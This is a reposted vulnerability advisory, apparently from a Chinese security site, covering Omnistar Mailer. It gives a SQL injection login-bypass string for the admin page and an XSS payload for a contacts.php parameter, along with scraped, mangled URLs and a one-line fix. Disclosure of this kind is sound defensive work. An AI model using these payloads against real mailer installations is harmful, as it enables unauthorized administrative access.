Omnistar Mailer多重缺陷及修复 - 网站安全 - 自学p

标题: Omnistar Mailer SQLi Vulnerability

开发者官网: http://HdhCmsTestomnistarmailer测试数据/ HdhCmsTest2cto测试数据

作者: Sid3^effects aKa HaRi <shell_c99[at]yahoo测试数据>

描述：

 

Are you a business and your are looking to increase your profit? Omnistar mailing list software will

 

 allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.

 

1.管理验证缺陷

 

万能密码：' or 1=1 or ''='

 

测试URL

          http://HdhCmsTest2cto测试数据 /mailerd4/admin/index.php

 

2.XSS

 

Attack pattern :"><script>alert("Sid3^effects")</script>

 

测试url :http://HdhCmsTest2cto测试数据 /mailerd4/admin/contacts.php?op=[xss]

 

 

修复：加强验证，过滤

 

# 0day no more

# Sid3^effects

查看更多关于Omnistar Mailer多重缺陷及修复 - 网站安全 - 自学p的详细内容...